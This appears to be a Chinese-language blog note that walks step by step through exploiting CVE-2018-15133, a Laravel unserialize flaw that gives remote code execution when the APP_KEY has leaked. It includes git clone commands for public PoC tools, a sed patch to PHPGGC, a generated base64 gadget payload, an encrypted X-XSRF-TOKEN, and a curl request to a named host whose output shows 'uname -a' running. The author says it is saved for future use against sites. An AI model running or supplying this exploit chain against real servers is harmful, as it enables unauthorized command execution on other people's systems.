laravel API_KEY泄露CVE-2018-15133漏洞利用

最近剛好遇到一個站laravel，可惜不在版本，mark以后方便使用

漏洞前提：

該漏洞可以分別在兩個地方觸發，一個是直接添加在 cookie 字段，例如： Cookie: ATTACK=payload ；

另一處是在 HTTP Header 處添加 X-XSRF-TOKEN 字段，例如： X-XSRF-TOKEN: payload 

 

漏洞影響版本：

5.5.x<=5.5.40、5.6.x<=5.6.29

 

1.獲取POC

git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133.git

2.拉取PHPGGC工具(如果只是測試可以不用拉取這個工具)

git clone https://github.com/ambionics/phpggc.git

因為本地是PHP7.2環境 需要修改PHPGGC代碼,執行：
sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php

3.查看本地APP_KEY

grep -e \^APP_KEY .env
APP_KEY=base64:RFU0lGJ4lnVLMCEB5Jl8I25u5o/l7GLLkSivNLUZqro=   //demo

4.使用PHPGGC生成利用代碼

phpggc Laravel/RCE1 'uname -a' -b
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

5.利用cve-2018-15133.php生成laravel漏洞利用代碼

./cve-2018-15133.php APP_KEY Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic

HTTP header for POST request: 
X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0=

6.測試漏洞

curl -X POST http://web.black_card.me/login -H 'X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0='| head -n 2
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1616    0  1616    0     0   4603      0 --:--:-- --:--:-- --:--:--  4603
Linux 9a29d8604c7a 4.15.0-42-generic #45-Ubuntu SMP Thu Nov 15 19:32:57 UTC 2018 x86_64 GNU/Linux
<!DOCTYPE html>

 

# http://blog.tuo0.com/2018/12/16/php/laravel-CVE-2018-15133%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

# https://xz.aliyun.com/t/6533